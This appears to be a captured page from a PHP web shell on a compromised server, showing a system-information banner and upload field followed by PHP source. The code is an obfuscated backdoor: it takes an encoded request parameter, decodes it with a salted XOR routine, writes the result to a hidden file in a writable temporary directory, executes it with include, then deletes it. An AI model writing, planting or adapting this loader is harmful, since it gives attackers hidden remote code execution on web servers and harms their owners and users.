| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/manger/ |
Upload File : |
<?php
if(in_array("p\x74\x72", array_keys($_REQUEST))){
$ent = $_REQUEST["p\x74\x72"];
$ent = explode ( '.' , $ent) ;
$ref = '';
$salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $salt2);
foreach( $ent as $u => $v1) {$sChar = ord( $salt2[$u % $lenS]);
$d = ( ( int)$v1 - $sChar -( $u % 10)) ^ 58;
$ref .= chr( $d);
}
$holder = array_filter([session_save_path(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP")]);
$pgrp = 0;
do {
$mrk = $holder[$pgrp] ?? null;
if ($pgrp >= count($holder)) break;
if (max(0, is_dir($mrk) * is_writable($mrk))) {
$value = "$mrk/.component";
if (file_put_contents($value, $ref)) {
include $value;
@unlink($value);
die();
}
}
$pgrp++;
} while (true);
}